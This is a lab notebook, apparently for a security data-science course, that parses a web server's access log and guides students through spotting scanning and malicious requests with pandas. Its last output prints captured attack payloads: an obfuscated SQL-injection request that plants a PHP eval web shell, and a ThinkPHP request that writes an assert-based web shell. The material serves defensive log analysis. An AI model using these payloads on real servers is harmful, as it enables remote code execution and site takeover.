# Get Set Up

## Import Libraries

In [0]:
# Pandas provides an extremely useful data structure
import pandas as pd

# RE provides regular expression pattern matching
import re

# datetime provides a datetime object class and conversion utilities
from datetime import datetime

# Web file access
from urllib.request import urlopen

# Math provides additional math functions
import math


## Define Some Functions

In [0]:
def log_ReadFile(logfile):
  with open(logfile) as fh:
    loglines = fh.readlines()
  loglines = [line.strip() for line in loglines]
  return loglines

In [0]:
def log_ReadURL(logfile):
  loglines = urlopen(logfile).readlines()
  loglines = [line.decode().strip() for line in loglines]
  return loglines

In [0]:
def log_Parser(log_list, regx_obj, col_list):
  # initialize empty lists for results
  logs_parsed = []
  parse_fails = []
  
  # parse logs using supplied regex and column list
  for line in log_list:
    match = regx_obj.match(line)
    if match:
      logs_parsed.append([match.group(col) for col in col_list]) 
    else:
      parse_fails.append(line)
      
  # return parsed data and list of lines that were not parsed correctly
  return logs_parsed, parse_fails

## Load Data

In [0]:
# URL of source data file
access_url = "https://raw.githubusercontent.com/urbansec/ds101/master/access.log.2019-03-22"

# Read log files into lists
access_logs = log_ReadURL(access_url)

In [0]:
# IP reputation indicators
intel_url = "https://raw.githubusercontent.com/urbansec/ds101/master/av_ip_reputation_2019-04-07.csv"
intel_cols = ['ip', 'risk', 'reliability', 'activity', 'country', 'city', 'lat_lon', 'unknown']
intel_df = pd.read_csv(intel_url, sep='#', header=None, names=intel_cols)
intel_df = intel_df.drop(columns=['unknown'])

In [0]:
# display first 5 lines in list
#display(error_logs[:5])

## Parse Data

In [0]:
# define a regex pattern to parse lines into fields
# sample line:
# ['54.36.148.18 - - [22/Mar/2019:01:58:55 -0700] "GET /self.logs/error.log.2016-04-07.gz HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"']
web_access_pattern = re.compile('(?P<client_ip>\S+)'
                                '\s+(?P<identity>\S+)'
                                '\s+(?P<username>\S+)'
                                '\s+\[(?P<date>[^\]]+)\]'
                                '\s+\"(?P<request>[^"]+)\"'
                                '\s+(?P<http_response>\d+)'
                                '\s+(?P<bytes>\d+)'
                                '\s+\"(?P<referrer>[^"]+)\"'
                                '\s+\"(?P<user_agent>.*)')

# define list of columns to use
access_column_list = ['date', 'client_ip', 'request', 'http_response', 'bytes', 'referrer', 'user_agent']


# call parser
access_logs_parsed, access_logs_parsefail = log_Parser(access_logs, web_access_pattern, access_column_list)


### Troubleshooting Only

In [0]:
# test parsing
#access_logs_parsed[:5]

In [0]:
# did any lines fail to parse?
#access_logs_parsefail[:5]

## Data Frame

In [0]:
# convert to Pandas DataFrame and display it
access_logs_df = pd.DataFrame.from_records(access_logs_parsed, columns=access_column_list)
access_logs_df['date'] = pd.to_datetime(access_logs_df['date'], format='%d/%b/%Y:%H:%M:%S -0700')
access_logs_df['bytes'] = pd.to_numeric(access_logs_df['bytes'], errors='coerce')
display(access_logs_df.head())

Unnamed: 0,date,client_ip,request,http_response,bytes,referrer,user_agent
0,2019-03-22 01:55:15,101.89.29.92,GET / HTTP/1.1,200,46424,-,Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like...
1,2019-03-22 01:57:37,54.36.148.43,GET /self.logs/2015/access.log.2015-05-08.gz H...,200,4813,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
2,2019-03-22 01:58:55,54.36.148.18,GET /self.logs/error.log.2016-04-07.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
3,2019-03-22 02:04:26,54.36.148.62,GET /self.logs/access.log.2016-10-30.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
4,2019-03-22 02:04:51,54.36.149.57,GET /self.logs/2016/error.log.2016-05-19.gz HT...,200,867,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...


# Instructions

In this lab, you will combine techniques from the previous labs to explore an additional dataset.  Namely, you will look at the web access logs from the same server as the error logs we looked at in the Data Basics lab.

* To save time, the logs have been parsed already.  They are stored in a Pandas DataFrame called "access_logs_df".

* Conduct exploratory data analysis to gain insight into these logs and answer the questions defined below.  We recommend inserting text blocks to organize your work, if helpful.  Several collapsible "header" sections have been provided to guide your analysis.

* The IP reputation data used in the previous labs is also available as a DataFrame.  It is stored in the variable "intel_df".

**To begin, choose "Runtime -> Run All" from the menu options.**

# Get a Feel For the Data

To get started, here are two easy steps provided for you.  Take a look at a sample of the data.  Then examine some basic summary statistics for the entire DataFrame (you should still examine inidividual columns more carefully).

## Examine the Data

In [0]:
access_logs_df.head()

Unnamed: 0,date,client_ip,request,http_response,bytes,referrer,user_agent
0,2019-03-22 01:55:15,101.89.29.92,GET / HTTP/1.1,200,46424,-,Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like...
1,2019-03-22 01:57:37,54.36.148.43,GET /self.logs/2015/access.log.2015-05-08.gz H...,200,4813,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
2,2019-03-22 01:58:55,54.36.148.18,GET /self.logs/error.log.2016-04-07.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
3,2019-03-22 02:04:26,54.36.148.62,GET /self.logs/access.log.2016-10-30.gz HTTP/1.1,404,284,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
4,2019-03-22 02:04:51,54.36.149.57,GET /self.logs/2016/error.log.2016-05-19.gz HT...,200,867,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...


## Summary Statistics

In [0]:
access_logs_df.describe(include='all')

Unnamed: 0,date,client_ip,request,http_response,bytes,referrer,user_agent
count,1305,1305,1305,1305.0,1305.0,1305,1305
unique,974,576,503,5.0,,67,135
top,2019-03-23 01:52:10,222.186.57.109,GET / HTTP/1.1,200.0,,-,Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:...
freq,32,23,306,837.0,,886,241
first,2019-03-22 01:55:15,,,,,,
last,2019-03-23 02:08:53,,,,,,
mean,,,,,150253.3,,
std,,,,,1735781.0,,
min,,,,,130.0,,
25%,,,,,295.0,,


Based on a quick look at the statistics, there are some factors that stand out as worthy of further investigation.

* The standard deviation for the number of bytes transferred per request is larger than the mean.  This indicates a high variance for that variable. 
* The vast majority of http response codes are 200.  Rows containing other values may be of interest.
* The vast majority of http referrers are blank.  Rows containing non-blank values may be of interest.


Additionally, we should be sure to explore the data contained in the remaining fields too.

# Data Transfer (bytes)

Start by creating a histogram of the "bytes" column to understand the shape of the data.

In [0]:
# Create a histogram


Almost all of the datapoints are concentrated at the very low end of the spectrum.  Select the rows of the DataFrame with bytes > 1e7 (10,000,000) to see if high values reveal anything interesting.

In [0]:
# Filter the dataframe to rows with large values of the "bytes" column


Now filter the dataframe and display a histogram showing only the rows closer to zero (bytes < 1000) to see the frequencies of the smaller values.

In [0]:
# Filter to rows with bytes < 1000 and display a histogram


The majority of these values seem to lay between 200 - 700 bytes.  Examine rows where bytes < 200.

In [0]:
# Display rows with bytes < 200


Since nothing so far has seemed unusual, let's look at the spike of the entries.  Filter the data to rows where the value of "bytes" is between 200 and 400.

In [0]:
# Filter to rows where bytes is between 200 - 400 and display
# Hint: you can use the ".between() method like... df[df['column'].between(200,400)]


This seems to contain many errors (http response 404).  Examining the number of bytes transferred has not revealed much of interest, from a security perspective.  It has lead us to a second area of inquiry however.

# HTTP Response Codes (http_response)

As we saw in our initial summary statistics, the majority of HTTP response codes in the dataset are "200" (meaning the connection completed normally).  List the frequency of each response code to get a sense of how these are distributed.

In [0]:
# Display frequency counts for the "http_response" variable
# Hint: use the ".value_counts()" method


HTTP response code 404 indicates a requested file was not found.  Display a sample of 10 rows containing this response code.

In [0]:
# Display the first 10 rows where the "http_response" variable is "404"
# Hint: using ".head(10)" instead of ".head()" will show 10 rows instead of 5


There seems to be a single IP causing many of the 404 errors.  Now filter the dataset to rows where the response code is 404 again, but this time display the frequency counts of the top IPs.  This will show us which IP addresses are causing repeated 404 errors.

In [0]:
# Display frequency counts of IPs, after filtering the dataset to containly only rows where the response code is 404


Finally, let's take one of the most egregious IPs and look at all the activity it is responsible for.  Filter the dataset to include only rows from one of these IPs and display the first 10 rows.

In [0]:
# Display the first 10 rows of activity caused by one of the IPs above that repeatedly causes 404 errors


You should see repeated POST requests for PHP files that do not exist.  This likely indicates someone running an automated tool that attempts to exploit known vulnerabilities in common web frameworks, such as WordPress.

**Good job!  Using basic data manipulation and statistical guidance, you have detected malicious activity!**

# HTTP Referrer (referrer)

Going back to the summary stats we generated at the beginning of this exercise, we noticed that more than half of the HTTP referrers were blank (i.e. set to "-").  Our previous exploration of number of bytes transferred and HTTP response codes lead us to believe that the majority of our dataset respresents benign activity.  Therefore, let's examine the less common case where the referrer is not blank to see if anything interesting is revealed.

Start by filtering to display only rows where the "referrer" field is not equal to "-".  This can be written as **referrer != "-"**

In [0]:
# Display the first 10 rows where referrer != "-"


You may notice some of the initial activity looks like web scanning activity again (POST requests for files that don't exist).  Next, perform the same filter for rows where the referrer isn't blank, but this time list the most frequent IPs.

In [0]:
# Display the most frequent IPs creating requests where the referrer isn't blank


You should notice significant overlap between this list, and the previous list of malicious IPs identified through our response code analysis.

**Nice work!  By continuing the analysis, you discovered a second relationship in the data that could be used to detect or confirm malicious activity!**

# Client IP Address (client_ip)

Our initial summary statistics did not reveal anything particularly interesting about this field.  With 1305 rows, there are 576 unique IPs, and the most frequent IP occurs only 23 times.

One thing that might yield some insights is adding context by checking to see if any of the IPs appear in our list of threat indicators (stored in the "intel_df" DataFrame).

Join our log dataset with our IP reputation data and display any matching items (refer to the Data Basics lab for an example).

In [0]:
# Join the log data with the ip reputation data and display matches


# Bonus Content

If you have made it this far and want to do some additional analysis, good on you!  Please enjoy these bonus challenges.

## User Agent String (user_agent)

The user agent string helps identify the browser version, allowing a web server to tailor its response accordingly.  If you don't know, they are relatively messy.  Our initial summary statistics didn't reveal anything unusual about this column.  In the interest of time, we will perform a quick analysis on the length of the strings, rather than sifting through the text itself.

The code snippet below generates a new dataframe that contains a single column.  The values in that column correspond to the length of each user agent string from the initial DataFrame.

In [0]:
ua_len_df = pd.DataFrame(access_logs_df['user_agent'].str.len())
ua_len_df = ua_len_df.rename(columns={'user_agent':'length'})

Create a histogram from the "ua_len_df" DataFrame to get a feel for the distribution of the lengths.

In [0]:
# Create a histogram of the ua_len_df DataFrame


Based on the histogram, decide what a "typical" range is for the length of a user agent string.  Then examine values that fall outside that range.  Because of the way we generated the DataFrame of lengths, we can use it to index a subset of the original data.

Below is an example of how to view especially long user agent strings.  Feel free to modify it based on the range you determined.

In [0]:
# Examine long user agent strings
access_logs_df[ua_len_df['length'] > 150].user_agent.value_counts()

Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10"                                                                                      6
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"                                                5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"                                                                                5
Mozilla/5.0 (Linux; Android 5.1.1; vivo V3 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044408 Mobile Safari/537.36 V1_AND_SQ_4.6.1_9_YYB_D 3.7.1 QQ/5.3.1.704 NetType/4G 10000519"    3
Mozi

In [0]:
# Examine short user agent strings


There doesn't seem to be anything unusual about the longer strings.  If your examination of the shorter strings reveals anything suspicious, display web activity associated with those user agent strings.

In [0]:
# Display access logs with suspicious user agent strings


## Examining Parse Errors

Examining errors that occur during parsing data is an important part of exploratory data analysis that we skipped in this lab for the sake of time.  It is important to resolve parsing issues and account for corrupt or missing data.

One interesting aspect of this is that parse errors are often caused by irregularities in the data itself.  Web access logs that were not parsed correctly are stored in a list named "access_logs_parsefail".

Examine these log lines using your web security expertise to see if they indicate unusual or malicious activity.

In [0]:
# Examine log lines that were now parsed correctly
access_logs_parsefail

['123.129.224.7 - - [22/Mar/2019:02:35:31 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:288:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"',
 '123.129.224.7 - - [22/Mar/2019:02:35:32 -0700] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=xarhm.php&content=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37 HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=index/\\\\think\\\\template\\\\driver\\\\file/write&cacheFile=xarhm.php&content=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"',
 '123.129.224.7 - - [22/Mar/2019:0